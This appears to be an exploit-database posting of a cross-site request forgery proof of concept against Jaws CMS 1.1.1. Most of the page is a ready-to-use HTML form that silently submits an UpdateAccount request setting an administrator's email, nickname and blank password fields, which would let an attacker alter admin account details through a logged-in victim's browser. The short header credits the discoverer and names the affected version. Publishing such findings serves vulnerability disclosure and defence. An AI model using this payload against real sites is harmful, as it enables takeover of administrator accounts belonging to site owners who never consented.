Home / exploits

PDF

Jaws 1.1.1 Cross Site Request Forgery

Posted on 15 April 2015

# Affected software: Jaws cms
# Type of vulnerability:csrf
# URL:http://www.opensourcecms.com/scripts/details.php?scriptid=38&name=Jaws
# Discovered by: provensec
# Website: provensec.com

#version: Jaws 1.1.1

# Proof of concept

<html>

 <body>
 <form action="http://demo.jaws-project.com/index.php" method="POST">
 <input type="hidden" name="gadget" value="Users" />
 <input type="hidden" name="action" value="UpdateAccount" />
 <input type="hidden" name="email" value="admin@example.org" />
 <input type="hidden" name="nickname" value="Jaws Administrator" />
 <input type="hidden" name="password" value="" />
 <input type="hidden" name="password_check" value="" />
 <input type="submit" value="Submit request" />
 </form>
 </body>
</html>

Jaws
<http://www.opensourcecms.com/scripts/details.php?scriptid=38&name=Jaws>

 

TOP